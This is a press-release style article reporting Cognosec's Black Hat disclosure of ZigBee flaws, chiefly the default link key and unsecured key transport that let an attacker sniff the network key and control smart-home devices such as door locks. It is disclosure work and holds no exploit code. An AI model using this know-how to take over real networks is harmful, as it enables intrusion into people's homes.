International IT security company, Cognosec has revealed critical security flaws in ZigBee, one of the most popular wireless communication standards used by Internet of Things (IoT) devices.
Speaking at Black Hat USA in Las Vegas, Nevada, Cognosec outlined the main security risks in ZigBee implementations, the devices affected and provided practical exploitations of actual product vulnerabilities.
A white paper explaining how the ZigBee standard can be exploited can be found here http://cognosec.com/zigbee_exploited_8F_Ca9.pdf Key details include:
- The ZigBee standard requires that an unsecure initial key transport has to be supported, reportedly making it possible to compromise ZigBee networks and take control of all connected devices on the network
- Manufacturers using the ZigBee standard include Samsung, Philips, Motorola, Texas Instruments and many others
- Devices on a home automation network may include security systems such as door locks and motion sensors, as well as heating, ventilation and air-conditioning (HVAC) systems and smart light bulbs/switches.
Commonly found in smart homes, the ZigBee standard was created to enable secure wireless communication for IoT devices. However, low per-unit-costs, interoperability and compatibility requirements, as well as the application of legacy security concepts, has led to the persistence of known security risks.
Having conducted numerous real world assessments on identified vulnerabilities, Cognosec discovered that it is possible to compromise ZigBee networks and take over control of all connected devices on a network. The practical security analysis of every device assessed showed that the solutions are designed for easy setup and usage but lack configuration possibilities for security and perform a vulnerable device pairing procedure that allows external parties to sniff the exchanged network key. This represents a critical vulnerability, as the security of the solution is solely reliant on the secrecy of this network key.
Tests with light bulbs, motion sensors, temperature sensors and even door locks have also shown that the vendors of the tested devices implemented the minimum of the features required to be certified. No other options to raise the level of security were implemented and available to the end-user.
One use case highlighted in the whitepaper and presentation was of external parties able to gain control over home automation systems, which have high privacy requirements and are a huge source of personalised data. The key to communicating between devices on a ZigBee network is the usage of application profiles. A ZigBee home automation profile permits a series of device types to exchange control messages to form a wireless home automation application. These devices are designed to exchange well-known messages to effect control, such as turning a lamp on or off, sending a light sensor measurement to a lighting controller, or sending an alert message if an occupancy sensor detects movement.
If a manufacturer wants a device to be compatible to other certified devices from other manufacturers, it has to implement the standard interfaces and practices of this profile. However, the use of a default link key introduces a high risk to the secrecy of the network key. Since the security of ZigBee is highly reliant on the secrecy of the key material and therefore on the secure initialisation and transport of the encryption keys, this default fallback mechanism has to be considered as a critical risk. If an attacker is able to sniff a device and join using the default link key, the active network key is compromised and the confidentiality of the whole network communication can be considered as compromised.
“The shortfalls and limitations we have discovered in ZigBee have been created by the manufacturers,” said Tobias Zillner at Cognosec. “Companies want to create the latest and greatest products, which today means they are likely to be internet connected. Simple units such as light switches have to be compatible with a whole host of other devices and, unsurprisingly, little consideration is made to security requirements – most likely to keep costs down. Unfortunately, the security risk in this last tier wireless communication standard can therefore be considered as very high.”
